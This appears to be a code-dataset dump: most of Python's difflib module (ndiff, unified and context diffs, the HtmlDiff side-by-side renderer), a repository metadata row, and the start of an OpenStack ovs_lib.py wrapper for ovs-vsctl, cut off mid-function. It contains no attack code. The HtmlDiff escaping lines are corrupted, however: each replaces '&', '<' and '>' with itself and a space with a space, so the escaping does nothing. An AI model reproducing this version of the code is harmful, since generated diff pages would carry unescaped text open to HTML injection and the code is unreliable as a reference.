# do intraline marking on the synch pair
aelt, belt = a[best_i], b[best_j]
if eqi is None:
# pump out a '-', '?', '+', '?' quad for the synched lines
atags = btags = ""
cruncher.set_seqs(aelt, belt)
for tag, ai1, ai2, bj1, bj2 in cruncher.get_opcodes():
la, lb = ai2 - ai1, bj2 - bj1
if tag == 'replace':
atags += '^' * la
btags += '^' * lb
elif tag == 'delete':
atags += '-' * la
elif tag == 'insert':
btags += '+' * lb
elif tag == 'equal':
atags += ' ' * la
btags += ' ' * lb
else:
raise ValueError('unknown tag %r' % (tag,))
yield from self._qformat(aelt, belt, atags, btags)
else:
# the synch pair is identical
yield ' ' + aelt
# pump out diffs from after the synch point
yield from self._fancy_helper(a, best_i+1, ahi, b, best_j+1, bhi)
def _fancy_helper(self, a, alo, ahi, b, blo, bhi):
g = []
if alo < ahi:
if blo < bhi:
g = self._fancy_replace(a, alo, ahi, b, blo, bhi)
else:
g = self._dump('-', a, alo, ahi)
elif blo < bhi:
g = self._dump('+', b, blo, bhi)
yield from g
def _qformat(self, aline, bline, atags, btags):
r"""
Format "?" output and deal with leading tabs.
Example:
>>> d = Differ()
>>> results = d._qformat('\tabcDefghiJkl\n', '\tabcdefGhijkl\n',
... ' ^ ^ ^ ', ' ^ ^ ^ ')
>>> for line in results: print(repr(line))
...
'- \tabcDefghiJkl\n'
'? \t ^ ^ ^\n'
'+ \tabcdefGhijkl\n'
'? \t ^ ^ ^\n'
"""
# Can hurt, but will probably help most of the time.
common = min(_count_leading(aline, "\t"),
_count_leading(bline, "\t"))
common = min(common, _count_leading(atags[:common], " "))
common = min(common, _count_leading(btags[:common], " "))
atags = atags[common:].rstrip()
btags = btags[common:].rstrip()
yield "- " + aline
if atags:
yield "? %s%s\n" % ("\t" * common, atags)
yield "+ " + bline
if btags:
yield "? %s%s\n" % ("\t" * common, btags)
# With respect to junk, an earlier version of ndiff simply refused to
# *start* a match with a junk element. The result was cases like this:
# before: private Thread currentThread;
# after: private volatile Thread currentThread;
# If you consider whitespace to be junk, the longest contiguous match
# not starting with junk is "e Thread currentThread". So ndiff reported
# that "e volatil" was inserted between the 't' and the 'e' in "private".
# While an accurate view, to people that's absurd. The current version
# looks for matching blocks that are entirely junk-free, then extends the
# longest one of those as far as possible but only with matching junk.
# So now "currentThread" is matched, then extended to suck up the
# preceding blank; then "private" is matched, and extended to suck up the
# following blank; then "Thread" is matched; and finally ndiff reports
# that "volatile " was inserted before "Thread". The only quibble
# remaining is that perhaps it was really the case that " volatile"
# was inserted after "private". I can live with that <wink>.
import re
def IS_LINE_JUNK(line, pat=re.compile(r"\s*(?:#\s*)?$").match):
r"""
Return 1 for ignorable line: iff `line` is blank or contains a single '#'.
Examples:
>>> IS_LINE_JUNK('\n')
True
>>> IS_LINE_JUNK(' # \n')
True
>>> IS_LINE_JUNK('hello\n')
False
"""
return pat(line) is not None
def IS_CHARACTER_JUNK(ch, ws=" \t"):
r"""
Return 1 for ignorable character: iff `ch` is a space or tab.
Examples:
>>> IS_CHARACTER_JUNK(' ')
True
>>> IS_CHARACTER_JUNK('\t')
True
>>> IS_CHARACTER_JUNK('\n')
False
>>> IS_CHARACTER_JUNK('x')
False
"""
return ch in ws
########################################################################
### Unified Diff
########################################################################
def _format_range_unified(start, stop):
'Convert range to the "ed" format'
# Per the diff spec at http://www.unix.org/single_unix_specification/
beginning = start + 1 # lines start numbering with one
length = stop - start
if length == 1:
return '{}'.format(beginning)
if not length:
beginning -= 1 # empty ranges begin at line just before the range
return '{},{}'.format(beginning, length)
def unified_diff(a, b, fromfile='', tofile='', fromfiledate='',
tofiledate='', n=3, lineterm='\n'):
r"""
Compare two sequences of lines; generate the delta as a unified diff.
Unified diffs are a compact way of showing line changes and a few
lines of context. The number of context lines is set by 'n' which
defaults to three.
By default, the diff control lines (those with ---, +++, or @@) are
created with a trailing newline. This is helpful so that inputs
created from file.readlines() result in diffs that are suitable for
file.writelines() since both the inputs and outputs have trailing
newlines.
For inputs that do not have trailing newlines, set the lineterm
argument to "" so that the output will be uniformly newline free.
The unidiff format normally has a header for filenames and modification
times. Any or all of these may be specified using strings for
'fromfile', 'tofile', 'fromfiledate', and 'tofiledate'.
The modification times are normally expressed in the ISO 8601 format.
Example:
>>> for line in unified_diff('one two three four'.split(),
... 'zero one tree four'.split(), 'Original', 'Current',
... '2005-01-26 23:30:50', '2010-04-02 10:20:52',
... lineterm=''):
... print(line) # doctest: +NORMALIZE_WHITESPACE
--- Original 2005-01-26 23:30:50
+++ Current 2010-04-02 10:20:52
@@ -1,4 +1,4 @@
+zero
one
-two
-three
+tree
four
"""
started = False
for group in SequenceMatcher(None,a,b).get_grouped_opcodes(n):
if not started:
started = True
fromdate = '\t{}'.format(fromfiledate) if fromfiledate else ''
todate = '\t{}'.format(tofiledate) if tofiledate else ''
yield '--- {}{}{}'.format(fromfile, fromdate, lineterm)
yield '+++ {}{}{}'.format(tofile, todate, lineterm)
first, last = group[0], group[-1]
file1_range = _format_range_unified(first[1], last[2])
file2_range = _format_range_unified(first[3], last[4])
yield '@@ -{} +{} @@{}'.format(file1_range, file2_range, lineterm)
for tag, i1, i2, j1, j2 in group:
if tag == 'equal':
for line in a[i1:i2]:
yield ' ' + line
continue
if tag in {'replace', 'delete'}:
for line in a[i1:i2]:
yield '-' + line
if tag in {'replace', 'insert'}:
for line in b[j1:j2]:
yield '+' + line
########################################################################
### Context Diff
########################################################################
def _format_range_context(start, stop):
'Convert range to the "ed" format'
# Per the diff spec at http://www.unix.org/single_unix_specification/
beginning = start + 1 # lines start numbering with one
length = stop - start
if not length:
beginning -= 1 # empty ranges begin at line just before the range
if length <= 1:
return '{}'.format(beginning)
return '{},{}'.format(beginning, beginning + length - 1)
# See http://www.unix.org/single_unix_specification/
def context_diff(a, b, fromfile='', tofile='',
fromfiledate='', tofiledate='', n=3, lineterm='\n'):
r"""
Compare two sequences of lines; generate the delta as a context diff.
Context diffs are a compact way of showing line changes and a few
lines of context. The number of context lines is set by 'n' which
defaults to three.
By default, the diff control lines (those with *** or ---) are
created with a trailing newline. This is helpful so that inputs
created from file.readlines() result in diffs that are suitable for
file.writelines() since both the inputs and outputs have trailing
newlines.
For inputs that do not have trailing newlines, set the lineterm
argument to "" so that the output will be uniformly newline free.
The context diff format normally has a header for filenames and
modification times. Any or all of these may be specified using
strings for 'fromfile', 'tofile', 'fromfiledate', and 'tofiledate'.
The modification times are normally expressed in the ISO 8601 format.
If not specified, the strings default to blanks.
Example:
>>> print(''.join(context_diff('one\ntwo\nthree\nfour\n'.splitlines(True),
... 'zero\none\ntree\nfour\n'.splitlines(True), 'Original', 'Current')),
... end="")
*** Original
--- Current
***************
*** 1,4 ****
one
! two
! three
four
--- 1,4 ----
+ zero
one
! tree
four
"""
prefix = dict(insert='+ ', delete='- ', replace='! ', equal=' ')
started = False
for group in SequenceMatcher(None,a,b).get_grouped_opcodes(n):
if not started:
started = True
fromdate = '\t{}'.format(fromfiledate) if fromfiledate else ''
todate = '\t{}'.format(tofiledate) if tofiledate else ''
yield '*** {}{}{}'.format(fromfile, fromdate, lineterm)
yield '--- {}{}{}'.format(tofile, todate, lineterm)
first, last = group[0], group[-1]
yield '***************' + lineterm
file1_range = _format_range_context(first[1], last[2])
yield '*** {} ****{}'.format(file1_range, lineterm)
if any(tag in {'replace', 'delete'} for tag, _, _, _, _ in group):
for tag, i1, i2, _, _ in group:
if tag != 'insert':
for line in a[i1:i2]:
yield prefix[tag] + line
file2_range = _format_range_context(first[3], last[4])
yield '--- {} ----{}'.format(file2_range, lineterm)
if any(tag in {'replace', 'insert'} for tag, _, _, _, _ in group):
for tag, _, _, j1, j2 in group:
if tag != 'delete':
for line in b[j1:j2]:
yield prefix[tag] + line
def ndiff(a, b, linejunk=None, charjunk=IS_CHARACTER_JUNK):
r"""
Compare `a` and `b` (lists of strings); return a `Differ`-style delta.
Optional keyword parameters `linejunk` and `charjunk` are for filter
functions (or None):
- linejunk: A function that should accept a single string argument, and
return true iff the string is junk. The default is None, and is
recommended; as of Python 2.3, an adaptive notion of "noise" lines is
used that does a good job on its own.
- charjunk: A function that should accept a string of length 1. The
default is module-level function IS_CHARACTER_JUNK, which filters out
whitespace characters (a blank or tab; note: bad idea to include newline
in this!).
Tools/scripts/ndiff.py is a command-line front-end to this function.
Example:
>>> diff = ndiff('one\ntwo\nthree\n'.splitlines(keepends=True),
... 'ore\ntree\nemu\n'.splitlines(keepends=True))
>>> print(''.join(diff), end="")
- one
? ^
+ ore
? ^
- two
- three
? -
+ tree
+ emu
"""
return Differ(linejunk, charjunk).compare(a, b)
def _mdiff(fromlines, tolines, context=None, linejunk=None,
charjunk=IS_CHARACTER_JUNK):
r"""Returns generator yielding marked up from/to side by side differences.
Arguments:
fromlines -- list of text lines to compared to tolines
tolines -- list of text lines to be compared to fromlines
context -- number of context lines to display on each side of difference,
if None, all from/to text lines will be generated.
linejunk -- passed on to ndiff (see ndiff documentation)
charjunk -- passed on to ndiff (see ndiff documentation)
This function returns an iterator which returns a tuple:
(from line tuple, to line tuple, boolean flag)
from/to line tuple -- (line num, line text)
line num -- integer or None (to indicate a context separation)
line text -- original line text with following markers inserted:
'\0+' -- marks start of added text
'\0-' -- marks start of deleted text
'\0^' -- marks start of changed text
'\1' -- marks end of added/deleted/changed text
boolean flag -- None indicates context separation, True indicates
either "from" or "to" line contains a change, otherwise False.
This function/iterator was originally developed to generate side by side
file difference for making HTML pages (see HtmlDiff class for example
usage).
Note, this function utilizes the ndiff function to generate the side by
side difference markup. Optional ndiff arguments may be passed to this
function and they in turn will be passed to ndiff.
"""
import re
# regular expression for finding intraline change indices
change_re = re.compile('(\++|\-+|\^+)')
# create the difference iterator to generate the differences
diff_lines_iterator = ndiff(fromlines,tolines,linejunk,charjunk)
def _make_line(lines, format_key, side, num_lines=[0,0]):
"""Returns line of text with user's change markup and line formatting.
lines -- list of lines from the ndiff generator to produce a line of
text from. When producing the line of text to return, the
lines used are removed from this list.
format_key -- '+' return first line in list with "add" markup around
the entire line.
'-' return first line in list with "delete" markup around
the entire line.
'?' return first line in list with add/delete/change
intraline markup (indices obtained from second line)
None return first line in list with no markup
side -- indice into the num_lines list (0=from,1=to)
num_lines -- from/to current line number. This is NOT intended to be a
passed parameter. It is present as a keyword argument to
maintain memory of the current line numbers between calls
of this function.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
num_lines[side] += 1
# Handle case where no user markup is to be added, just return line of
# text with user's line format to allow for usage of the line number.
if format_key is None:
return (num_lines[side],lines.pop(0)[2:])
# Handle case of intraline changes
if format_key == '?':
text, markers = lines.pop(0), lines.pop(0)
# find intraline changes (store change type and indices in tuples)
sub_info = []
def record_sub_info(match_object,sub_info=sub_info):
sub_info.append([match_object.group(1)[0],match_object.span()])
return match_object.group(1)
change_re.sub(record_sub_info,markers)
# process each tuple inserting our special marks that won't be
# noticed by an xml/html escaper.
for key,(begin,end) in sub_info[::-1]:
text = text[0:begin]+'\0'+key+text[begin:end]+'\1'+text[end:]
text = text[2:]
# Handle case of add/delete entire line
else:
text = lines.pop(0)[2:]
# if line of text is just a newline, insert a space so there is
# something for the user to highlight and see.
if not text:
text = ' '
# insert marks that won't be noticed by an xml/html escaper.
text = '\0' + format_key + text + '\1'
# Return line of text, first allow user's line formatter to do its
# thing (such as adding the line number) then replace the special
# marks with what the user's change markup.
return (num_lines[side],text)
def _line_iterator():
"""Yields from/to lines of text with a change indication.
This function is an iterator. It itself pulls lines from a
differencing iterator, processes them and yields them. When it can
it yields both a "from" and a "to" line, otherwise it will yield one
or the other. In addition to yielding the lines of from/to text, a
boolean flag is yielded to indicate if the text line(s) have
differences in them.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
lines = []
num_blanks_pending, num_blanks_to_yield = 0, 0
while True:
# Load up next 4 lines so we can look ahead, create strings which
# are a concatenation of the first character of each of the 4 lines
# so we can do some very readable comparisons.
while len(lines) < 4:
try:
lines.append(next(diff_lines_iterator))
except StopIteration:
lines.append('X')
s = ''.join([line[0] for line in lines])
if s.startswith('X'):
# When no more lines, pump out any remaining blank lines so the
# corresponding add/delete lines get a matching blank line so
# all line pairs get yielded at the next level.
num_blanks_to_yield = num_blanks_pending
elif s.startswith('-?+?'):
# simple intraline change
yield _make_line(lines,'?',0), _make_line(lines,'?',1), True
continue
elif s.startswith('--++'):
# in delete block, add block coming: we do NOT want to get
# caught up on blank lines yet, just process the delete line
num_blanks_pending -= 1
yield _make_line(lines,'-',0), None, True
continue
elif s.startswith(('--?+', '--+', '- ')):
# in delete block and see an intraline change or unchanged line
# coming: yield the delete line and then blanks
from_line,to_line = _make_line(lines,'-',0), None
num_blanks_to_yield,num_blanks_pending = num_blanks_pending-1,0
elif s.startswith('-+?'):
# intraline change
yield _make_line(lines,None,0), _make_line(lines,'?',1), True
continue
elif s.startswith('-?+'):
# intraline change
yield _make_line(lines,'?',0), _make_line(lines,None,1), True
continue
elif s.startswith('-'):
# delete FROM line
num_blanks_pending -= 1
yield _make_line(lines,'-',0), None, True
continue
elif s.startswith('+--'):
# in add block, delete block coming: we do NOT want to get
# caught up on blank lines yet, just process the add line
num_blanks_pending += 1
yield None, _make_line(lines,'+',1), True
continue
elif s.startswith(('+ ', '+-')):
# will be leaving an add block: yield blanks then add line
from_line, to_line = None, _make_line(lines,'+',1)
num_blanks_to_yield,num_blanks_pending = num_blanks_pending+1,0
elif s.startswith('+'):
# inside an add block, yield the add line
num_blanks_pending += 1
yield None, _make_line(lines,'+',1), True
continue
elif s.startswith(' '):
# unchanged text, yield it to both sides
yield _make_line(lines[:],None,0),_make_line(lines,None,1),False
continue
# Catch up on the blank lines so when we yield the next from/to
# pair, they are lined up.
while(num_blanks_to_yield < 0):
num_blanks_to_yield += 1
yield None,('','\n'),True
while(num_blanks_to_yield > 0):
num_blanks_to_yield -= 1
yield ('','\n'),None,True
if s.startswith('X'):
raise StopIteration
else:
yield from_line,to_line,True
def _line_pair_iterator():
"""Yields from/to lines of text with a change indication.
This function is an iterator. It itself pulls lines from the line
iterator. Its difference from that iterator is that this function
always yields a pair of from/to text lines (with the change
indication). If necessary it will collect single from/to lines
until it has a matching pair from/to pair to yield.
Note, this function is purposefully not defined at the module scope so
that data it needs from its parent function (within whose context it
is defined) does not need to be of module scope.
"""
line_iterator = _line_iterator()
fromlines,tolines=[],[]
while True:
# Collecting lines of text until we have a from/to pair
while (len(fromlines)==0 or len(tolines)==0):
from_line, to_line, found_diff = next(line_iterator)
if from_line is not None:
fromlines.append((from_line,found_diff))
if to_line is not None:
tolines.append((to_line,found_diff))
# Once we have a pair, remove them from the collection and yield it
from_line, fromDiff = fromlines.pop(0)
to_line, to_diff = tolines.pop(0)
yield (from_line,to_line,fromDiff or to_diff)
# Handle case where user does not want context differencing, just yield
# them up without doing anything else with them.
line_pair_iterator = _line_pair_iterator()
if context is None:
while True:
yield next(line_pair_iterator)
# Handle case where user wants context differencing. We must do some
# storage of lines until we know for sure that they are to be yielded.
else:
context += 1
lines_to_write = 0
while True:
# Store lines up until we find a difference, note use of a
# circular queue because we only need to keep around what
# we need for context.
index, contextLines = 0, [None]*(context)
found_diff = False
while(found_diff is False):
from_line, to_line, found_diff = next(line_pair_iterator)
i = index % context
contextLines[i] = (from_line, to_line, found_diff)
index += 1
# Yield lines that we have collected so far, but first yield
# the user's separator.
if index > context:
yield None, None, None
lines_to_write = context
else:
lines_to_write = index
index = 0
while(lines_to_write):
i = index % context
index += 1
yield contextLines[i]
lines_to_write -= 1
# Now yield the context lines after the change
lines_to_write = context-1
while(lines_to_write):
from_line, to_line, found_diff = next(line_pair_iterator)
# If another change within the context, extend the context
if found_diff:
lines_to_write = context-1
else:
lines_to_write -= 1
yield from_line, to_line, found_diff
_file_template = """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1" />
<title></title>
<style type="text/css">%(styles)s
</style>
</head>
<body>
%(table)s%(legend)s
</body>
</html>"""
_styles = """
table.diff {font-family:Courier; border:medium;}
.diff_header {background-color:#e0e0e0}
td.diff_header {text-align:right}
.diff_next {background-color:#c0c0c0}
.diff_add {background-color:#aaffaa}
.diff_chg {background-color:#ffff77}
.diff_sub {background-color:#ffaaaa}"""
_table_template = """
<table class="diff" id="difflib_chg_%(prefix)s_top"
cellspacing="0" cellpadding="0" rules="groups" >
<colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
<colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>
%(header_row)s
<tbody>
%(data_rows)s </tbody>
</table>"""
_legend = """
<table class="diff" summary="Legends">
<tr> <th colspan="2"> Legends </th> </tr>
<tr> <td> <table border="" summary="Colors">
<tr><th> Colors </th> </tr>
<tr><td class="diff_add"> Added </td></tr>
<tr><td class="diff_chg">Changed</td> </tr>
<tr><td class="diff_sub">Deleted</td> </tr>
</table></td>
<td> <table border="" summary="Links">
<tr><th colspan="2"> Links </th> </tr>
<tr><td>(f)irst change</td> </tr>
<tr><td>(n)ext change</td> </tr>
<tr><td>(t)op</td> </tr>
</table></td> </tr>
</table>"""
class HtmlDiff(object):
"""For producing HTML side by side comparison with change highlights.
This class can be used to create an HTML table (or a complete HTML file
containing the table) showing a side by side, line by line comparison
of text with inter-line and intra-line change highlights. The table can
be generated in either full or contextual difference mode.
The following methods are provided for HTML generation:
make_table -- generates HTML for a single side by side table
make_file -- generates complete HTML file with a single side by side table
See tools/scripts/diff.py for an example usage of this class.
"""
_file_template = _file_template
_styles = _styles
_table_template = _table_template
_legend = _legend
_default_prefix = 0
def __init__(self,tabsize=8,wrapcolumn=None,linejunk=None,
charjunk=IS_CHARACTER_JUNK):
"""HtmlDiff instance initializer
Arguments:
tabsize -- tab stop spacing, defaults to 8.
wrapcolumn -- column number where lines are broken and wrapped,
defaults to None where lines are not wrapped.
linejunk,charjunk -- keyword arguments passed into ndiff() (used to by
HtmlDiff() to generate the side by side HTML differences). See
ndiff() documentation for argument default values and descriptions.
"""
self._tabsize = tabsize
self._wrapcolumn = wrapcolumn
self._linejunk = linejunk
self._charjunk = charjunk
def make_file(self,fromlines,tolines,fromdesc='',todesc='',context=False,
numlines=5):
"""Returns HTML file of side by side comparison with change highlights
Arguments:
fromlines -- list of "from" lines
tolines -- list of "to" lines
fromdesc -- "from" file column header string
todesc -- "to" file column header string
context -- set to True for contextual differences (defaults to False
which shows full differences).
numlines -- number of context lines. When context is set True,
controls number of lines displayed before and after the change.
When context is False, controls the number of lines to place
the "next" link anchors before the next change (so click of
"next" link jumps to just before the change).
"""
return self._file_template % dict(
styles = self._styles,
legend = self._legend,
table = self.make_table(fromlines,tolines,fromdesc,todesc,
context=context,numlines=numlines))
def _tab_newline_replace(self,fromlines,tolines):
"""Returns from/to line lists with tabs expanded and newlines removed.
Instead of tab characters being replaced by the number of spaces
needed to fill in to the next tab stop, this function will fill
the space with tab characters. This is done so that the difference
algorithms can identify changes in a file when tabs are replaced by
spaces and vice versa. At the end of the HTML generation, the tab
characters will be replaced with a nonbreakable space.
"""
def expand_tabs(line):
# hide real spaces
line = line.replace(' ','\0')
# expand tabs into spaces
line = line.expandtabs(self._tabsize)
# replace spaces from expanded tabs back into tab characters
# (we'll replace them with markup after we do differencing)
line = line.replace(' ','\t')
return line.replace('\0',' ').rstrip('\n')
fromlines = [expand_tabs(line) for line in fromlines]
tolines = [expand_tabs(line) for line in tolines]
return fromlines,tolines
def _split_line(self,data_list,line_num,text):
"""Builds list of text lines by splitting text lines at wrap point
This function will determine if the input text line needs to be
wrapped (split) into separate lines. If so, the first wrap point
will be determined and the first line appended to the output
text line list. This function is used recursively to handle
the second part of the split line to further split it.
"""
# if blank line or context separator, just add it to the output list
if not line_num:
data_list.append((line_num,text))
return
# if line text doesn't need wrapping, just add it to the output list
size = len(text)
max = self._wrapcolumn
if (size <= max) or ((size -(text.count('\0')*3)) <= max):
data_list.append((line_num,text))
return
# scan text looking for the wrap point, keeping track if the wrap
# point is inside markers
i = 0
n = 0
mark = ''
while n < max and i < size:
if text[i] == '\0':
i += 1
mark = text[i]
i += 1
elif text[i] == '\1':
i += 1
mark = ''
else:
i += 1
n += 1
# wrap point is inside text, break it up into separate lines
line1 = text[:i]
line2 = text[i:]
# if wrap point is inside markers, place end marker at end of first
# line and start marker at beginning of second line because each
# line will have its own table tag markup around it.
if mark:
line1 = line1 + '\1'
line2 = '\0' + mark + line2
# tack on first line onto the output list
data_list.append((line_num,line1))
# use this routine again to wrap the remaining text
self._split_line(data_list,'>',line2)
def _line_wrapper(self,diffs):
"""Returns iterator that splits (wraps) mdiff text lines"""
# pull from/to data and flags from mdiff iterator
for fromdata,todata,flag in diffs:
# check for context separators and pass them through
if flag is None:
yield fromdata,todata,flag
continue
(fromline,fromtext),(toline,totext) = fromdata,todata
# for each from/to line split it at the wrap column to form
# list of text lines.
fromlist,tolist = [],[]
self._split_line(fromlist,fromline,fromtext)
self._split_line(tolist,toline,totext)
# yield from/to line in pairs inserting blank lines as
# necessary when one side has more wrapped lines
while fromlist or tolist:
if fromlist:
fromdata = fromlist.pop(0)
else:
fromdata = ('',' ')
if tolist:
todata = tolist.pop(0)
else:
todata = ('',' ')
yield fromdata,todata,flag
def _collect_lines(self,diffs):
"""Collects mdiff output into separate lists
Before storing the mdiff from/to data into a list, it is converted
into a single line of text with HTML markup.
"""
fromlist,tolist,flaglist = [],[],[]
# pull from/to data and flags from mdiff style iterator
for fromdata,todata,flag in diffs:
try:
# store HTML markup of the lines into the lists
fromlist.append(self._format_line(0,flag,*fromdata))
tolist.append(self._format_line(1,flag,*todata))
except TypeError:
# exceptions occur for lines where context separators go
fromlist.append(None)
tolist.append(None)
flaglist.append(flag)
return fromlist,tolist,flaglist
def _format_line(self,side,flag,linenum,text):
"""Returns HTML markup of "from" / "to" text lines
side -- 0 or 1 indicating "from" or "to" text
flag -- indicates if difference on line
linenum -- line number (used for line number column)
text -- line text to be marked up
"""
try:
linenum = '%d' % linenum
id = ' id="%s%s"' % (self._prefix[side],linenum)
except TypeError:
# handle blank lines where linenum is '>' or ''
id = ''
# replace those things that would get confused with HTML symbols
text=text.replace("&","&").replace(">",">").replace("<","<")
# make space non-breakable so they don't get compressed or line wrapped
text = text.replace(' ',' ').rstrip()
return '<td class="diff_header"%s>%s</td><td nowrap="nowrap">%s</td>' \
% (id,linenum,text)
def _make_prefix(self):
"""Create unique anchor prefixes"""
# Generate a unique anchor prefix so multiple tables
# can exist on the same HTML page without conflicts.
fromprefix = "from%d_" % HtmlDiff._default_prefix
toprefix = "to%d_" % HtmlDiff._default_prefix
HtmlDiff._default_prefix += 1
# store prefixes so line format method has access
self._prefix = [fromprefix,toprefix]
def _convert_flags(self,fromlist,tolist,flaglist,context,numlines):
"""Makes list of "next" links"""
# all anchor names will be generated using the unique "to" prefix
toprefix = self._prefix[1]
# process change flags, generating middle column of next anchors/links
next_id = ['']*len(flaglist)
next_href = ['']*len(flaglist)
num_chg, in_change = 0, False
last = 0
for i,flag in enumerate(flaglist):
if flag:
if not in_change:
in_change = True
last = i
# at the beginning of a change, drop an anchor a few lines
# (the context lines) before the change for the previous
# link
i = max([0,i-numlines])
next_id[i] = ' id="difflib_chg_%s_%d"' % (toprefix,num_chg)
# at the beginning of a change, drop a link to the next
# change
num_chg += 1
next_href[last] = '<a href="#difflib_chg_%s_%d">n</a>' % (
toprefix,num_chg)
else:
in_change = False
# check for cases where there is no content to avoid exceptions
if not flaglist:
flaglist = [False]
next_id = ['']
next_href = ['']
last = 0
if context:
fromlist = ['<td></td><td> No Differences Found </td>']
tolist = fromlist
else:
fromlist = tolist = ['<td></td><td> Empty File </td>']
# if not a change on first line, drop a link
if not flaglist[0]:
next_href[0] = '<a href="#difflib_chg_%s_0">f</a>' % toprefix
# redo the last link to link to the top
next_href[last] = '<a href="#difflib_chg_%s_top">t</a>' % (toprefix)
return fromlist,tolist,flaglist,next_href,next_id
def make_table(self,fromlines,tolines,fromdesc='',todesc='',context=False,
numlines=5):
"""Returns HTML table of side by side comparison with change highlights
Arguments:
fromlines -- list of "from" lines
tolines -- list of "to" lines
fromdesc -- "from" file column header string
todesc -- "to" file column header string
context -- set to True for contextual differences (defaults to False
which shows full differences).
numlines -- number of context lines. When context is set True,
controls number of lines displayed before and after the change.
When context is False, controls the number of lines to place
the "next" link anchors before the next change (so click of
"next" link jumps to just before the change).
"""
# make unique anchor prefixes so that multiple tables may exist
# on the same page without conflict.
self._make_prefix()
# change tabs to spaces before it gets more difficult after we insert
# markup
fromlines,tolines = self._tab_newline_replace(fromlines,tolines)
# create diffs iterator which generates side by side from/to data
if context:
context_lines = numlines
else:
context_lines = None
diffs = _mdiff(fromlines,tolines,context_lines,linejunk=self._linejunk,
charjunk=self._charjunk)
# set up iterator to wrap lines that exceed desired width
if self._wrapcolumn:
diffs = self._line_wrapper(diffs)
# collect up from/to lines and flags into lists (also format the lines)
fromlist,tolist,flaglist = self._collect_lines(diffs)
# process change flags, generating middle column of next anchors/links
fromlist,tolist,flaglist,next_href,next_id = self._convert_flags(
fromlist,tolist,flaglist,context,numlines)
s = []
fmt = ' <tr><td class="diff_next"%s>%s</td>%s' + \
'<td class="diff_next">%s</td>%s</tr>\n'
for i in range(len(flaglist)):
if flaglist[i] is None:
# mdiff yields None on separator lines skip the bogus ones
# generated for the first line
if i > 0:
s.append(' </tbody> \n <tbody>\n')
else:
s.append( fmt % (next_id[i],next_href[i],fromlist[i],
next_href[i],tolist[i]))
if fromdesc or todesc:
header_row = '<thead><tr>%s%s%s%s</tr></thead>' % (
'<th class="diff_next"><br /></th>',
'<th colspan="2" class="diff_header">%s</th>' % fromdesc,
'<th class="diff_next"><br /></th>',
'<th colspan="2" class="diff_header">%s</th>' % todesc)
else:
header_row = ''
table = self._table_template % dict(
data_rows=''.join(s),
header_row=header_row,
prefix=self._prefix[1])
return table.replace('\0+','<span class="diff_add">'). \
replace('\0-','<span class="diff_sub">'). \
replace('\0^','<span class="diff_chg">'). \
replace('\1','</span>'). \
replace('\t',' ')
del re
def restore(delta, which):
r"""
Generate one of the two sequences that generated a delta.
Given a `delta` produced by `Differ.compare()` or `ndiff()`, extract
lines originating from file 1 or 2 (parameter `which`), stripping off line
prefixes.
Examples:
>>> diff = ndiff('one\ntwo\nthree\n'.splitlines(keepends=True),
... 'ore\ntree\nemu\n'.splitlines(keepends=True))
>>> diff = list(diff)
>>> print(''.join(restore(diff, 1)), end="")
one
two
three
>>> print(''.join(restore(diff, 2)), end="")
ore
tree
emu
"""
try:
tag = {1: "- ", 2: "+ "}[int(which)]
except KeyError:
raise ValueError('unknown delta choice (must be 1 or 2): %r'
% which)
prefixes = (" ", tag)
for line in delta:
if line[:2] in prefixes:
yield line[2:]
| [
"[email protected]"
] | |
b61dd5981a9177ea2adff1e9fbfbe535e6ea3ce7 | 636d06ee1f85caace855f8fb8d9e6c09a22c18ba | /quantum/agent/linux/ovs_lib.py | 5e8cb94a0b86269778e403aebd87819442fd93dc | [
"Apache-2.0"
] | permissive | linvictor88/vse-lbaas-driver | bf377e9c3804c9329bc15797150dcc50a3d2ea65 | 08eadb2929468554a409cf13e5ec1fac1d59a73e | refs/heads/master | 2016-09-11T06:27:22.495017 | 2013-07-28T16:02:45 | 2013-07-28T16:02:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,771 | py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Nicira Networks, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Somik Behera, Nicira Networks, Inc.
# @author: Brad Hall, Nicira Networks, Inc.
# @author: Dan Wendlandt, Nicira Networks, Inc.
# @author: Dave Lapsley, Nicira Networks, Inc.
import re
from quantum.agent.linux import ip_lib
from quantum.agent.linux import utils
from quantum.openstack.common import log as logging
LOG = logging.getLogger(__name__)
class VifPort:
def __init__(self, port_name, ofport, vif_id, vif_mac, switch):
self.port_name = port_name
self.ofport = ofport
self.vif_id = vif_id
self.vif_mac = vif_mac
self.switch = switch
def __str__(self):
return ("iface-id=" + self.vif_id + ", vif_mac=" +
self.vif_mac + ", port_name=" + self.port_name +
", ofport=" + str(self.ofport) + ", bridge_name =" +
self.switch.br_name)
class OVSBridge:
def __init__(self, br_name, root_helper):
self.br_name = br_name
self.root_helper = root_helper
self.re_id = self.re_compile_id()
def re_compile_id(self):
external = 'external_ids\s*'
mac = 'attached-mac="(?P<vif_mac>([a-fA-F\d]{2}:){5}([a-fA-F\d]{2}))"'
iface = 'iface-id="(?P<vif_id>[^"]+)"'
name = 'name\s*:\s"(?P<port_name>[^"]*)"'
port = 'ofport\s*:\s(?P<ofport>-?\d+)'
_re = ('%(external)s:\s{ ( %(mac)s,? | %(iface)s,? | . )* }'
' \s+ %(name)s \s+ %(port)s' % {'external': external,
'mac': mac,
'iface': iface, 'name': name,
'port': port})
return re.compile(_re, re.M | re.X)
def run_vsctl(self, args):
full_args = ["ovs-vsctl", "--timeout=2"] + args
try:
return utils.execute(full_args, root_helper=self.root_helper)
except Exception as e:
LOG.error(_("Unable to execute %(cmd)s. Exception: %(exception)s"),
{'cmd': full_args, 'exception': e})
